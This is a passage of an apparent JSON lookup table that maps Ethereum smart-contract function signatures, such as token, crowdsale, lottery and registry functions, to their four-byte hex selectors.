"SAMPLEToken()": "0x757f70fb", "addBudget(uint256,uint256)": "0xf700abf1", "retrieveAll()": "0x95607ced", "changeYumAddress(address,address)": "0x6350ec6f", "sendyum(address)": "0xfbad8983", "calcNextPrize()": "0x009888ce", "updateExistingRaz(uint256,uint256,uint256,uint256,uint256)": "0xa75eb727", "addNewRaz(uint256,uint256,uint256,uint256)": "0x16c6f470", "changeWinnerPrizeMoneyForRaz(uint256,uint256)": "0xf65625ae", "changeParticipationFeeForRaz(uint256,uint256)": "0xbd187e3b", "GetUserBetsInRaz(address,uint256)": "0x54da44db", "declareWinnerForRaz(uint256,uint256)": "0xa222c98d", "resetRaz(uint256)": "0x807fb834", "getAvailableNumbersForRaz(uint256)": "0x6180e4ac", "hasRazCompleted(uint256)": "0x5ef27d1a", "MarkRazAsComplete(uint256)": "0x42007fd3", "EnterBetsForRaz(uint256,uint256[])": "0xe9938919", "whitelistMaxTok(uint256,address)": "0xcf14cecc", "isEnabled(bytes32)": "0x0610e037", "mnemonicsCount()": "0x201de654", "enablePhenomenon(bytes32)": "0x25c50f97", "disablePhenomenon(bytes32)": "0x1e7231b6", "addPhenomenon(string,string,string,uint8)": "0xfc184fff", "MummyAccountWithdraw()": "0xfc450ae6", "limits()": "0x860aefcf", "checkState()": "0x96dfcbea", "getUser2()": "0x9e01f9b9", "getUser1()": "0x36d81f07", "currentDateTime()": "0x227e14e9", "getDateTime(uint256)": "0xc41f9482", "getHash(string)": "0x5b6beeb9", "getTimestamp(string)": "0x32e5e595", "storeHash(string,string)": "0x6f28ee09", "IOVContract()": "0x598b771d", "SogetiTestCoin()": "0x9968b87b", "transferAnyMEPToken(address,uint256)": "0x54a8ca69", "decodeCurrency(bytes32)": "0x1b962c65", "encodeCurrency(string)": "0x5ee759e8", "isValidContract(bytes32)": "0xa983c932", "deleteContract(bytes32)": "0xdec0257d", "rejectContract(bytes32)": "0x7522aff5", "approveContract(bytes32)": "0xb6fae6c7", "submitContract(bytes32)": "0xc750df73", "SmartIdentityRegistry()": "0x2e8ac384", "EPAYCLUB()": "0x493ca31a", "initGeneralAttr(uint32,uint64)": "0x379f946a", "presell()": "0x0bc16f1b", "getOneFree(address)": "0x3f73365f", "randomSkill()": "0x8149ea9b", "getAttrVal(uint64,uint8)": "0x30859963", "getRandom256()": "0x521fba71", "isPresellOpen()": "0x5741fbce", "setPresellOpen(bool)": "0x72309714", "setPresellPrice(uint256)": "0xdc9deeff", "getPreSelledInPool()": "0x8cf9f5e7", "getWaitPreselled()": "0x1eae5ff9", "getTotalPreSelled()": "0x9284cb0c", "setERC20Contract(address)": "0xcac8d538", "setAssetContract(address)": "0x1760705f", "isOnAuction(uint64)": "0xb28f6fa3", "getPlayerDetectGroup(address)": "0xa8baa97d", "getPlayerState(address)": "0xc01ca43f", "isIdle(address,uint64)": "0x909d3bc9", "isOwn(address,uint64)": "0x521f4195", "hasPlayer(address)": "0x0cc88021", "getPlayerGeneralAll(uint32)": "0x5f27f6e3", "getPlayerGeneralAttr(uint64,uint8)": "0x1e3f11ee", "getPlayerGeneral(uint64)": "0x8d1a7765", "getPlayerHasGetFree(address,address)": "0xd9bdc10c", "getGidOfId(uint64)": "0x5d08225e", "transfer(address,address,uint64)": "0x2a308b3a", "setPlayerHasGetFree(address,address,bool)": "0x77b11de3", "setPlayerDetectGroup(address,address,uint8,uint32)": "0x64caf214", "setPlayerGeneralAttrAdd(uint64,uint8,uint32)": "0xb4596ea6", "setPlayerGeneralAttr(uint64,uint32,uint32,uint32,uint32)": "0xecbb06c9", "setPlayerGeneralLv(uint64,uint8)": "0xd188f550", "numTilesClaimed()": "0x1604c449", "PROOF_MULTISIG()": "0xa24ea868", "PERCENTAGE_PRECISION()": "0xe256888f", "fundingMinInWei()": "0xb0720613", "migrateBlockjack()": "0x58be98dd", "reserveWave()": "0xb0acc531", "crowdsaleIsActive()": "0xa3c0a477", "getPayoutCumulativeInterval()": "0x9ffcc4c3", "lastBlock_v4Hash_uint256()": "0x2d37329a", "TEAM_TOKENS1()": "0xddf33cc7", "RESERVE_EXCHANGE_RATE()": "0xa88be96b", "TeamLockingPeriod18Months()": "0x840880f2", "coldWallet2()": "0x1bbec4e7", "lastMintTime()": "0x9d463520", "ourLastWinner()": "0xf9add1b9", "bidHash()": "0x654f4b61", "leaderAddress()": "0x10abda2b", "TOKEN_PRICE_DENOM()": "0xa9cc077a", "start_block()": "0xb87fb3db", "fundingUnlockTime()": "0xc1273676", "card_black_first()": "0x186cd7d2", "maximumJackpot()": "0xf1204db6", "withdrawTime()": "0x45cb3dde", "USER_ACQUISITION()": "0xcd4e396b", "MIN_BONUS()": "0x324ab080", "MONTH_IN_SEC()": "0x175d27e0", "TIME_PERIOD_IN_SEC()": "0xf1ce9595", "campaignDurationDays()": "0x19711d67", "ticketsNum()": "0xb7caf50a", "PEP()": "0x95260a29", "auctionSumPlat()": "0x789cf5e2", "advisoryBoardFundManager()": "0x6dc51f1e", "numberBtcUpdates()": "0x3e0807ca", "tracetoMultiSigContract()": "0x05e87e2a", "HAYATO_MAX_CARGO()": "0x16e3cad0", "transferDividends()": "0x741ad7a3", "maxPercentPerPlayer()": "0xc30b8867", "isSaleInitialized()": "0xf42355a4", "rateBTCxETH()": "0x2b21d01b", "COLOR_BROWN()": "0x8c549ef7", "withdraw_token_and_eth()": "0x1ae743ad", "upgrades()": "0x045d2ad9", "maxPreSale1Token()": "0x5b053c04", "classic()": "0x74439ca7", "trueSupply()": "0x86867740", "tonextround()": "0x54313b22", "bonusAvailable()": "0xf57e2368", "blockTokens()": "0xf56e4cb1", "Donated()": "0x12285576", "tokensForIco()": "0x82ea97b3", "secondStageMinted()": "0xa0aaa87f", "eventListener()": "0xcd9217f7", "blockDelay()": "0xd98f6088", "maximumInWei()": "0x969ea336", "losePercent()": "0x6e321105", "isFundReleased()": "0x02410cf6", "sumElements(uint16[])": "0xcfab6554", "ADDITIONAL_PORTION()": "0x802f5bae", "CanYaCoinToken()": "0x0b6f6e0d", "initOwner()": "0xc2d53eb4", "STATE_OWNED()": "0xa6e7f409", "airdroppedAmount()": "0x0b6c9ac7", "bountyAmount()": "0xccd331bf", "raiseRatio()": "0xa899e615", "m_pending()": "0xbd3b5d07", "averageBlockTime()": "0x233dedf1", "upgradeAddress()": "0x631f0d66", "chunksAlreadyVested()": "0xf7f50faa", "currentBurned()": "0xf7969147", "unbondingPeriod()": "0x6cf6d675", "ICO_MINIMUM_CONTRIBUTION()": "0x22e8df23", "softcapPreSale()": "0x4b63189c", "preIcoCap()": "0xceb10f1c", "TechnicalRise()": "0x1be22528", "etherSince20()": "0x4f868b94", "buyPriceInWei()": "0xfb7cf694", "bottomName()": "0x65045a2b", "maxEthToRaise()": "0xeb30f57d", "arbitrator()": "0x6cc6cde1", "preSaleFirstDay()": "0x97a1c2cd", "presaleTokenSold()": "0xff197bc3", "tokensRemainingStage2()": "0xef802e62", "preICO_tokens()": "0xae078036", "card_black_minamount()": "0x4c73eef6", "boughtWithWhitelist()": "0x7c623ce2", "noviceDungeonId()": "0x6438f449", "OPERATE_SUPPLY()": "0xcbaf4742", "SALE_MAX_CAP()": "0x9903c29c", "safeCloseSale()": "0x354537da", "DURATION_DECREASE_PER_ETHER()": "0xf141d076", "merchantIdHash()": "0xf0daba01", "MAX_CONTRIBUTION_DURATION()": "0xe9d8d3d7", "teamTokenFund()": "0x4ddbf2b3", "totalSoldTokensWithoutBonus()": "0xa64a1c0b", "MoacSupply()": "0x964997a4", "fixPrice()": "0x75593a39", "soldTokensCounter()": "0xe8801360", "disbursementHandler()": "0x7467bc92", "preSaleWeiRaised()": "0x04f65590", "minimumBet()": "0xc38a8afd", "registerAs(address,string,uint256,string,address)": "0x7b1a547c", "register(address,address,string,string,bytes32[],uint256,string)": "0x8b7f0ddd", "register(address,string,string)": "0x8d59cc02", "register(address)": "0x4420e486", "Register(address)": "0xeeda149c", "register(address,string,uint256,string)": "0x66b42dcb", "refund(uint256,uint256)": "0x5af36e3e", "Refund(uint32)": "0x847f8a10", "refundBounty(uint256)": "0x58b1f29c", "refill()": "0x538e0759", "reduceDebt(address,address,uint256)": "0x578bcc20", "recycle()": "0x0f23cbaa", "RecoveryWithTenant()": "0xe20bbd8d", "recoverUser(address,address,uint256,uint8,bytes32,bytes32)": "0xf32efd3c", "recover(uint256)": "0x0ca35682", "recover(address)": "0x0cd865ec", "recover(address,address)": "0x648bf774", "_recoverAccount(address,address)": "0xf06d335e", "record(string)": "0xe51ace16", "recordCommissionEarned(uint256)": "0xc864e760", "receiveTransfer(uint256)": "0x49d55d9d", "receiveTokens(uint256)": "0x743e0c9b", "receivePaymentForGoodsSoldEarly()": "0x248582b0", "rebalance()": "0x7d7c2a1c", "readLog(uint256)": "0xb7213bd4", "react()": "0x2d2800f1", "_rawTransfer(address,address,uint256)": "0xba344743", "rate(uint256,uint256,string)": "0x74fbbc86", "rankDown(uint256,uint256)": "0xeb7cdb56", "random(uint256)": "0xb863bd37", "RandomNumberFromSeed(uint256)": "0x7741b4ec", "RandomNumber()": "0x8e3957d9", "randInt(uint256,uint256)": "0x0b15650b", "Randao()": "0xe0c7c117", "quick2()": "0xf28a7912", "quick()": "0xfdd3a879", "queryN_withGasLimit(uint256,string,bytes,uint256)": "0xc55c1cb6", "queryN(uint256,string,bytes)": "0x83eed3d5", "queryEarnings(address)": "0x4306cc3f", "quadrupler()": "0xafd09bab", "pushTerm(string)": "0xacc8cb18", "pushCoin(uint256,address,string)": "0x4616caa9", "pushCity()": "0x0eb495c2", "PullPaymentCapable()": "0x57e25a79", "publish(bytes32)": "0x8b2e6dcf", "publicKey(uint256)": "0x8940aebe", "PT()": "0xd94073d4", "proxyTransferWithReference(address,uint256,bytes32,string)": "0x64ef212e", "proxyTransferToICAPWithReference(bytes32,uint256,string)": "0xc5487661", "proxyTransferFromWithReference(address,address,uint256,bytes32,string)": "0xf0cbe059", "proxyTransferFromToICAPWithReference(address,bytes32,uint256,string)": "0xea98e540", "proxySetCosignerAddress(address,bytes32)": "0xe82b7cb2", "proxyApprove(address,uint256,bytes32)": "0x4f09eba7", "ProtectTheCastle()": "0xa9b8f7b8", "protectKingdom()": "0x1fdf6e0c", "proposeReverse(string,address)": "0xac4e73f9", "proposeEmergencyWithdrawal(address)": "0x4671e65e", "ProofOfExistence()": "0x9801cb8e", "prolongateContract()": "0x87914c6f", "_projectCommitNew(address)": "0xa055fe64", "_projectCancelNew()": "0x6a3c1198", "_projectAddNew(address,uint256)": "0xe1f5ebc5", "profitDistribution()": "0x80acaafb", "processPayout()": "0x5c52e51e", "processFee()": "0x61aa8d93", "processed(uint64)": "0x22dc36e2", "Prism()": "0x1288c42a", "price()": "0xa035b1fe", "prev(address)": "0x45788ce2", "preRegister(address)": "0x6bae05cf", "prepend(address,address)": "0xf8018a79", "prepend(address)": "0xe6c1beb4", "prepareLottery()": "0xf81d087d", "_prepareAndSendReward()": "0x13bd4e2c", "precalculate()": "0x2c02d622", "pow10(uint256,uint8)": "0xc6a17d2b", "post(string,address,string)": "0xb45105b2", "PosRewards()": "0x3570c2ee", "populateAllowedFreeExchanges()": "0xd1f0bb2d", "PlusOnePonzi()": "0xe6cbcba9", "plusOnePonzi()": "0x4c0eceb5", "Play(uint8,uint8,uint8,uint8)": "0x39b333d9", "playerWithdrawPendingTransactions()": "0xa5f4af33", "PlayerTickets(address,uint256,uint256)": "0x24fb563f", "playerRollDice(uint256)": "0xdc6dd152", "player_make_bet(uint8)": "0xeace4827", "PlayerInfo(uint256)": "0x63aea3e0", "PlayerInfoPerZone(uint256,uint256)": "0x46b04e53", "playerGetPendingTxByAddress(address)": "0x3c314a91", "player_declare_taking_too_long()": "0xa4fde8bc", "player_collect_winnings(uint256)": "0xc068eae0", "player_2(uint256)": "0x1ef0625b", "player_1(uint256)": "0x3e4c0c82", "play(bytes32)": "0xc7a1865b", "play(address,uint256)": "0xf0e10c0d", "play4(address,uint256)": "0xdb18c972", "play2(address,uint256)": "0x2ddbc04a", "play1(address,uint256)": "0x71b6663e", "placeWager()": "0xb1cc4348", "placeSellOrder(uint256,uint256)": "0xa4406bcd", "addCollaborate(uint256,address,bytes32,uint256)": "0x560bd3ec", "createCampaign(uint256,bytes32,bytes32,bytes32)": "0x93f6fd85", "getMemberName(uint256,address)": "0x7250dc36", "disable_throwing()": "0x52929a0c", "set_balance(address,uint256)": "0x0776e4fa", "set_label(bytes12,bytes32)": "0x770eb5bb", "set_owner(bytes12,address)": "0xc9085820", "tryGet(bytes12)": "0xcd5f5c4a", "testFail_set_label_unauth()": "0x277e268e", "test_set_label()": "0xf6a25127", "testFail_set_owner_unauth()": "0x5d0ad8d0", "test_set_owner()": "0x7bc76388", "testFail_set_price_unauth()": "0x268451a2", "testFail_set_price_without_token()": "0xd205f1e6", "test_failed_payment_nonthrowing_token()": "0x38bbbceb", "test_failed_payment_throwing_token()": "0x79bae8a1", "test_already_paid()": "0x0f2fa473", "test_payment()": "0xb44531d3", "test_get_expired()": "0xd6bd64fc", "test_get()": "0xbe03c602", "test_claim()": "0x7ce8e196", "executeProof(bytes32[],uint256)": "0xf4fba1bc", "verifyStep(uint256,bytes,bytes,bytes)": "0x4591a980", "emitAccessBlocked(address,bytes32)": "0x157fbd8d", "emitAccessGiven(address,bytes32)": "0x2c19d480", "_emitAccessBlocked(address,bytes32)": "0xcfa06700", "_emitAccessGiven(address,bytes32)": "0x2fc9a415", "isAllowed(address,bytes32)": "0x5cb8dd09", "blockAccess(address,bytes32)": "0xbd17a9d8", "giveAccess(address,bytes32)": "0x85c53cf1", "DraftPlayer(address,uint256)": "0x0bf05c99", "SetDraftOrder()": "0x19a04a33", "AddParticipant(address,uint256)": "0x9a3241a6", "League(address,uint256)": "0xf8a17d7f", "LeagueAdministrator()": "0xf6ecebf2", "setDisputeThresholdForFork(uint256)": "0xec79f9bd", "setIsForking(bool)": "0x208af09f", "removeMarketFromWasCalled()": "0x8cce7e92", "addMarketToWasCalled()": "0x99abaabb", "getOrCacheTargetReporterGasCostsWasCalled()": "0xbb6198dd", "decreaseRepAvailableForExtraBondPayouts(uint256)": "0x3fe43020", "increaseRepAvailableForExtraBondPayouts(uint256)": "0xf5218ec2", "getRepAvailableForExtraBondPayouts()": "0xb08639e3", "getOrCacheValidityBondWallCalled()": "0xec756ee5", "getOrCreateNextFeeWindowWasCalled()": "0xab3f699c", "getOrCreateFeeWindowByMarketEndTime(uint256)": "0x1429a36b", "getOrCreateChildUniverse(bytes32)": "0xc9af089f", "setIsContainerForReportingParticipant(bool)": "0x7051a831", "getInitializeParentPayoutDistributionHashValue()": "0x2740e64b", "getInitializParentUniverseValue()": "0x5b7fc27f", "setForkReputationGoal(uint256)": "0xaf1484d0", "setIncrementOpenInterest(bool)": "0xaac8788a", "setDecrementOpenInterest(bool)": "0xacedc33e", "setIsContainerForShareToken(bool)": "0xc1d6ab37", "setIsParentOf(bool)": "0xff78e48b", "setMarketCreationCost(uint256)": "0x718ec079", "setOrCacheTargetReporterGasCosts(uint256)": "0x4eee121f", "setCalculateFloatingValue(uint256)": "0x32098d4c", "setDecreaseRepAvailableForExtraBondPayouts(bool)": "0x4580a950", "setIncreaseRepAvailableForExtraBondPayouts(bool)": "0xbcafe9a9", "setRepAvailableForExtraBondPayouts(uint256)": "0x9e92448e", "setReportingFeeDivisor(uint256)": "0xb59bc382", "setOrCacheDesignatedReportNoShowBond(uint256)": "0x8e6b5462", "setOrCacheDesignatedReportStake(uint256)": "0xd7bbce2a", "setOrCacheValidityBond(uint256)": "0x12950877", "setTargetRepMarketCapInAttoeth(uint256)": "0x1b5c16bf", "setRepMarketCapInAttoeth(uint256)": "0x201f96e5", "setOpenInterestInAttoEth(uint256)": "0x9a04a4ed", "setDisputeRoundDurationInSeconds(uint256)": "0x719b2e07", "setParentPayoutDistributionHash(bytes32)": "0xefada94b", "setForkEndTime(uint256)": "0x832bff3a", "getForkCalled()": "0x8945e00d", "ExampleToken()": "0xe00d7e5c", "circulation()": "0x5fdf60fb", "ENJAllocation(address)": "0x8df1a8db", "totalAllocated()": "0x45f7f249", "incentivisationFundAddress()": "0xb384e9b4", "crowdfundAddress()": "0x72f74af8", "_emitHashSet(address,bytes32,bytes32)": "0x826a483f", "emitHashSet(address,bytes32,bytes32)": "0xa8af6e05", "getHash(address,bytes32)": "0x060f919b", "assertOperationIsConsistent(bytes32)": "0x54c29ce6", "assertOwnersAreConsistent()": "0x1e2f48da", "isOperationActive(bytes32)": "0x2c7a64c7", "makeOwnerBitmapBit(address)": "0xe8aa1f5e", "checkOwnerIndex(uint256)": "0xec216c34", "HealthCashMock()": "0xd9bb6102", "getSomeVar()": "0x04f03b6a", "doubleSomeVar()": "0xb447acfa", "callSelf()": "0x0adfba60", "DualMintableToken(address,address)": "0x001b1cf0", "createFaucet()": "0xbf9c3949", "testFooApprove(uint256)": "0x5a527afb", "testFooUdate(uint256)": "0x620ffe99", "StatusContributionMock()": "0xf02011a8", "CategoryAuction(address)": "0x6bc21808", "setSellOrdersContract(address)": "0x54a1e232", "setBuyOrdersContract(address)": "0x88aece7f", "upgradeDeploymentAdmins(address)": "0xbd7474ca", "GxOrderList(address)": "0xedf1da66", "bountyDrop(address[],uint256[])": "0xb749b225", "grantInvestorsTokens(address[])": "0xc47fc244", "grantInvestorTokens(address)": "0x207cb710", "claimBitNauticTokens()": "0xa85b13b9", "_tokenPurchased(address,address,uint256)": "0x57548f32", "burnTokens()": "0x08003f78", "setAMLWhitelistedBulk(address[],bool[])": "0x6173e456", "setAMLWhitelisted(address,bool)": "0xb6f0ecb1", "setKYCLevelsBulk(address[],uint8[])": "0x3836a6d2", "setKYCLevel(address,uint8)": "0xdcd7dd2e", "takeSellOrder(address,uint256,uint256,address)": "0x0d02369b", "takeBuyOrder(address,uint256,uint256,uint256,address)": "0x8f24f2a3", "cancelAllBuyOrders(address,uint256,uint256)": "0x69af0634", "cancelAllSellOrders(address,uint256,uint256)": "0xe61b762b", "makeBuyOrder(address,uint256)": "0x41db1875", "makeSellOrder(address,uint256,uint256)": "0x6dc92426", "calculateFee(uint256,uint256)": "0x34e73122", "calculateFeeForAccount(uint256,uint256,address)": "0xa4094a0d", "feeFromTotalCost(uint256,uint256)": "0x72d744e0", "feeFromTotalCostForAccount(uint256,uint256,address)": "0xeefea6b7", "changeTakeFee(uint256)": "0xf1ae5437", "changeMakeFee(uint256)": "0x2c577347", "changeLastFreeBlock(uint256)": "0x9a8ae2fa", "changeGBTAddress(address)": "0x284e4175", "Doves()": "0xcc937ccd", "setReservedHolder(address,address,address)": "0x312975a6", "setAngelHolder(address)": "0xdf6d3afa", "investByLegalTender(address,uint256,uint256)": "0x3c40066d", "CircleCrowdsale(uint256,address)": "0x9373e2a1", "getBeneficiaryCash(bool)": "0xa49c2bbb", "forwardFunds(address)": "0xd1aea543", "getAvailableBlance()": "0x02e0a2ff", "getSeller(uint256)": "0xd6a9de51", "giveBirth(uint256,uint256)": "0x7b422184", "setGiveBirthType(bool)": "0xcaa14e36", "setCreationProfit(uint256)": "0xc05b7cf6", "_sendMoney(address,uint256)": "0x9ec760df", "EarthToken()": "0xc378a83b", "ICTA()": "0xf62bc2dc", "tokenResend()": "0x5384527a", "createTokenOwner()": "0xc4806df4", "setNewTokenOwner(address)": "0x9795aabf", "setTransfersEnabled()": "0x359170e6", "sendTokens(address,address,uint256)": "0xe6d66ac8", "activateRevenueShareIdentifier(string)": "0x8dff4abd", "replaceTokenFix(address[],uint256[])": "0x98f8193b", "replaceToken(address[])": "0x0a612095", "setOldTokenAddress(address)": "0xc7b87d74", "getHype(uint256)": "0xc13b3895", "Hypes()": "0xd21b93df", "setNewWallet(address)": "0x1905fbf6", "changeMaxContribution(uint256)": "0x68894a16", "changeMinContribution(uint256)": "0xb3b81d38", "PreICO(uint256,uint256,uint256,uint256,address,address)": "0xe9a1e689", "getBid(bytes32)": "0x91704e1e", "forfeit(bytes32)": "0xf192e91c", "reveal(bytes32,uint256,bytes32)": "0x5137aa7b", "add(bytes32,uint256,bytes,bytes8)": "0xd0f8c714", "passOnContract()": "0xad86ee0b", "_burn(address,address,uint256)": "0x6ee678ae", "icoTransfer(address,uint256)": "0xc6159a35", "awardReferralBonus(address,address,uint256)": "0xecdf5459", "getKycApproved(uint256)": "0xf5c758c4", "getKycHash(uint256)": "0xcb3204a8", "setKycProvider(address)": "0xdf0795aa", "kycApproved(address)": "0x6641cc64", "setKycHash(bytes32)": "0xb160a86b", "refer(address,address)": "0xf4544255", "rewardPool()": "0x66666aa9", "AFEBToken()": "0xfa0a6cfe", "HexelErc20Token(string,string,uint256,address)": "0x3d34f921", "soowhat()": "0x0b12e7e2", "backRedPillTokenOwner()": "0xdb74c27a", "RedPillToken()": "0xc445e2ef", "TIXIToken()": "0x598e728a", "processContributions(address,uint256)": "0x98004a2a", "setWeiRaised(uint256)": "0xafdebfe7", "FaradTokenSwap()": "0xafd7d464", "XXXToken()": "0x75669274", "RSOC()": "0x17484b0c", "Shopiblock()": "0xa1da32be", "TokenERC20(uint256,string,string,uint256)": "0x63e79315", "powerAddr()": "0x48594f43", "nutzAddr()": "0x0f61280e", "toggleSale(bool)": "0xaab402e5", "setStore(address)": "0x087cbd40", "setEtherCentPrice(uint256)": "0x65a3d8f0", "setUseService(bool)": "0x8b3272dc", "setPriceInCents(uint256)": "0x898aa23b", "CNYToken(uint256,string,uint8,string)": "0x92b1696d", "Tutorial()": "0x17235779", "changeStakingFees(uint80,uint80,uint80,int256,uint80,int256,uint256,int256,uint80,uint80,uint256)": "0x9d2f1cbb", "payStakingFee(address,uint256,uint80,uint80,uint256,address)": "0xb8760ad3", "wipeBlacklistedAccount(address)": "0xbd7243f6", "changeBurnBounds(uint256,uint256)": "0x70df42e1", "USDDigital()": "0x165ca484", "setDelegatedFrom(address)": "0x61927adb", "decreaseApprovalAllArgs(address,uint256,address)": "0xe8d8c3a7", "increaseApprovalAllArgs(address,uint256,address)": "0x29ce3b69", "approveAllArgs(address,uint256,address)": "0x2014d703", "frozenAccountCoinByTime(address,uint256,uint256)": "0x330aa207", "freezeAccountCoin(address,uint256)": "0x5aa8e281", "cetokToken()": "0x39d05fdd", "DigiCrowdSale()": "0xa2aaa10e", "lastNonce(address)": "0xc0fd43b4", "checkTransferHash(address,uint256,address,address,uint256,uint256,bytes)": "0x0f45368c", "getTransferHash(address,uint256,address,address,uint256,uint256)": "0xe46f20dc", "LoveTracker()": "0x412e829f", "GetUserPools(address)": "0x9e536132", "GetPoolInformation(address)": "0x0e2ebe6c", "CreateNewPool(address,address,uint256,uint256,uint256,bool,address[],uint256,uint256)": "0x3bc17fc3", "ForceSendTokens(address)": "0x3513d339", "WithdrawMyTokens()": "0xc8cb8677", "EnableTokenWithdrawals()": "0xc924d441", "SendFundsToReceiver(uint256)": "0x4e72f19e", "UpdateTokenAddress(address)": "0xf9be437a", "UpdateICOAddress(address)": "0x16e4f677", "RestartReceivingContributions()": "0x50833515", "FinishReceivingContributions()": "0x7bc94872", "GetContributorInformation(address)": "0x2a73db5c", "GetPoolInformation()": "0x2deb65c7", "getRemainingTarget()": "0xf20341a8", "UpdatePoolTarget(uint256)": "0xac8fbd09", "UpdateIndividualContributorCap(address,uint256)": "0x72630a6d", "WithdrawContribution(uint256)": "0x1f5dddab", "ContributeToPool()": "0x13178704", "UpdateWhiteListImplementation(bool)": "0xa07c9156", "AddMultipleAddresseseToWhitelist(address[])": "0xde0123bf", "AddAddressToWhitelist(address)": "0xaee40270", "check_data(string)": "0xe275a016", "change_data(string)": "0x358a11b4", "revealHiddenPosition(uint32,int64,bytes16)": "0x67da2831", "addHiddenPosition(uint32,bytes32)": "0x3176e734", "hashPosition(uint32,int64,bytes16)": "0xb9eb04f3", "addExplicitPosition(uint32,int64)": "0xc2304c4a", "getStrategyHiddenState(bytes32)": "0xd67a12d4", "getExplicitStrategyState()": "0x89ba8e61", "resetExplicitState(uint32,int64,int256,uint64,int8)": "0xbba04dc9", "modifyBet(uint256,uint256)": "0x9f12fde0", "addBet(uint256)": "0xcdaba786", "bigBearCoin()": "0x5858e7d0", "SMT()": "0x8a18c55f", "EYToken()": "0x912c3fbf", "HomeBridge(uint256,address[])": "0x580225d5", "Existing(address)": "0x8e0273bb", "getFlight(uint16,uint16)": "0x7ac5bb54", "getFlightConnections(uint16)": "0xff51d18c", "setFlights(uint16[],uint16[],uint256[],uint256[])": "0x79d8cc7b", "addCities(bytes32[],uint256[],uint256[])": "0x63c6fe04", "addAction(bytes32,bytes32,string,uint256,bool,uint256,uint256,uint256,uint256,bytes32)": "0x73efc627", "getRateScore(uint256)": "0x60bddc04", "removeScore(uint256,uint256)": "0x1c9cae74", "addScore(uint256,uint256)": "0xddcbf794", "removeRate(uint256,uint256)": "0xc60b099f", "addRate(uint256,uint256)": "0xde3fbdee", "citiesCount()": "0xfd70f406", "actionsCount()": "0x9bccfe49", "getCooldown(uint256,uint16,uint8)": "0x9a556a59", "getAmbientLightException(bytes32)": "0x506092f7", "getAmbientHumidityException(bytes32)": "0x740d0a6f", "getAmbientTempException(bytes32)": "0x9d4095cc", "getn2Exception(bytes32)": "0xd7dbb88b", "getPhException(bytes32)": "0x2c3dfca7", "getSoilHumdtyException(bytes32)": "0x6e68ec59", "getSoilTempException(bytes32)": "0xd34ed095", "CheckAmbientLightException(bytes32,uint32)": "0x695a7e9d", "CheckAmbientHumdtyException(bytes32,uint32)": "0xb0a5c979", "CheckAmbientTempException(bytes32,uint32)": "0xb89fde71", "CheckN2Exception(bytes32,uint32)": "0x85f59db3", "CheckPhException(bytes32,uint32)": "0x59badbec", "CheckSoilHumdtyException(bytes32,uint32)": "0x29c40d5f", "CheckSoilTempException(bytes32,uint32)": "0x2dfdaf59", "exception(address,address)": "0x56a041fc", "getAmbientLightControlLimits(bytes32)": "0xea222fde", "getAmbientHumidityControlLimits(bytes32)": "0x1c15b285", "getAmbientTempControlLimits(bytes32)": "0x89935c39", "getN2ControlLimits(bytes32)": "0x3f257776", "getPhControlLimits(bytes32)": "0x7e4b5eb5", "getSoilHumidityControlLimits(bytes32)": "0xac5895f6", "getSoilTempControlLimits(bytes32)": "0x0526179e", "setlimits(bytes32,uint32[],uint32[],uint8[])": "0x388777f1", "controlLimits(address)": "0x3600e1e2", "GetAllNode()": "0x36d9377e", "RegisterNode(bytes32)": "0xfc248fd6", "nodeRegistry()": "0xd9b5c4a5", "setContract3(address)": "0xb71f8010", "setContract1(address)": "0x17ef67c6", "setContract2(address)": "0x89462c38", "editNumber(uint256)": "0x6b99a13e", "buy(uint8,bytes)": "0xee27e707", "CheckCourse(uint256)": "0x4002f0b0", "_NumOfStudentsPass()": "0x221b1c4a", "NumOfStudentsRequests()": "0xcad66781", "ApplyForCertification(string,string,string,string,uint256)": "0x5d293581", "coursesLength()": "0xb333adfc", "addCourse(string,uint256,string,string,string,string)": "0x4b8b7a2a", "moftakToken()": "0xe824b9c7", "TB01()": "0xdbedf9e4", "test2(uint256,uint32)": "0xaf1cd6d3", "test(uint256,uint32)": "0xb4daff13", "JCoinz()": "0x06b5338a", "publicGetParticipant(uint256,uint256)": "0xef2b7d65", "_withdrawTokensFor(address)": "0x86598549", "postCrowdsaleWithdraw(uint256)": "0xfc512b92", "setBonusMultiplier(uint256)": "0xfd58e63a", "unfreeze_contract()": "0xc450a25f", "freeze_contract()": "0x41c41923", "Entrant(address)": "0x9906f81b", "WFCC()": "0xd9409bc5", "get_ptc_count(address)": "0x1335b598", "EligmaMintingContract()": "0x7ea2e31c", "getMyDino()": "0x4c418879", "getFreeDino()": "0x003b0a3f", "setFreeDino(uint16)": "0x61e1fe91", "DinoFarm()": "0x99e47b2d", "WaltonToken()": "0x7da21a1a", "HashCoinToken()": "0xbfe36f58", "phaseClaim()": "0x5e66eb1b", "startPhase3()": "0x5f2b9ac0", "HeliumNetwork()": "0x4a85d0d5", "setDateStart(uint256)": "0xe5ed78bb", "buyIcoTokens(uint256)": "0x06222be3", "buyPreIcoTokens(uint256)": "0x804327bb", "StudToken(uint256)": "0x9ce31fe1", "DAZ()": "0x6385f2fb", "Bogotcoin()": "0x463fb5f1", "deleteNick()": "0xb65ff419", "saveNick(string)": "0x04bb89d5", "MDAToken()": "0xdeeb7124", "SaveYouAndMeToken()": "0x68968564", "FaradEscrow()": "0xd0b86d15", "CoinPulseToken()": "0xce7f6e82", "supportNewPurge(address,address,uint256)": "0xf9ae77ff", "supportNewVoter(address,address)": "0x8c6b6085", "propose(address,bytes32,address[],bytes32[])": "0x7fd5bb31", "purgeVoter(address,uint256)": "0x44669e40", "runLottery(uint256)": "0xfe75ff54", "newVoterAllocation()": "0x71fa632f", "verifierAllocation()": "0x59d3d632", "addVoter(address,address,bytes32)": "0x08891c0a", "proposeVoter(bytes32)": "0x9b671604", "proposePurge(address,bytes32)": "0x33fc5f47", "supportNewMoon(address)": "0x919e7f42", "MarbleEarth(address,address)": "0xe95d0a59", "PainPoints()": "0x15e9c2d4", "initialAllocation()": "0xd2ecb4f9", "saleAccepting()": "0x8abab8fb", "sale3Accepting()": "0x4414356b", "sale2Accepting()": "0x067969a3", "sale1Accepting()": "0xf70904b4", "GCoin()": "0xfc773166", "ArtaoToken(uint256,string,string)": "0x2d98d251", "MLQD()": "0x66f8e86f", "LightCoinToken()": "0x49f9231d", "mimax(uint64,uint64)": "0x0f03be37", "mimin(uint64,uint64)": "0x85c5e9f8", "midiv(uint64,uint64)": "0x53240172", "mimul(uint64,uint64)": "0xa7cf7edd", "misub(uint64,uint64)": "0x4129912c", "miadd(uint64,uint64)": "0x13cd528a", "mmax(uint128,uint128)": "0xd3ee86e7", "mmin(uint128,uint128)": "0xa2bfae64", "mdiv(uint128,uint128)": 